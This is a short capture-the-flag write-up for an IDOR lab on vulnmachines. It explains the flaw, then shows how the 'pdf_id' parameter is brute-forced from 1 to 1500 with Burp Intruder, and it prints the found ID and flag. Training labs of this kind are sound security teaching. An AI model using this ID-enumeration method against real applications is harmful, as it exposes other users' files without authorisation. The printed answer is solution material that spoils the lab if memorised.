Insecure Direct Object Reference write-up vulnmachines
What is IDOR?
Insecure Direct Object Reference(IDOR) is a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. In IDOR, attackers can bypass authorization and access resources. It does so by allowing attackers to directly modify the value of a parameter used to directly point to an object.
Question:
Capture the flag by leveraging the IDOR vulnerability.
Solution:
Step 1: Visit vulnmachines.com
Step 2: Go to Mission -> Game -> Mission. Select ‘Insecure Direct Object References’.
Step 3: Click on Lab Access.
Step 4: You will be redirected to the below page
Vulnerable Parameter : Download PDF
We entered ‘2000’ in the Download PDF field for example.
Step 5: In the Download PDF parameter, enter 1248 and capture the request in Burp Suite.
Step 6: From the above request (Step 5), the ‘Pdf_id’ parameter is vulnerable to IDOR. Send this request to the Intruder and apply bruteforce attack on ‘pdf_id’ parameter.
In the above figure, select payload numbers, payload options from 1 to 1500 then click on the start attack button.
Payload 69 has length 1317.
Vulnerable payload id is 69. Download 69 number PDF and get the flag.
Flag: vnm{“Congratulations!! Y0U H4VE FOUND ID0R}
Reference:
https://www.geeksforgeeks.org/insecure-direct-object-reference-idor-vulnerability/
https://secops.group/blog/exploiting-idors-a-compilation-of-some-neat-new-and-crazy-examples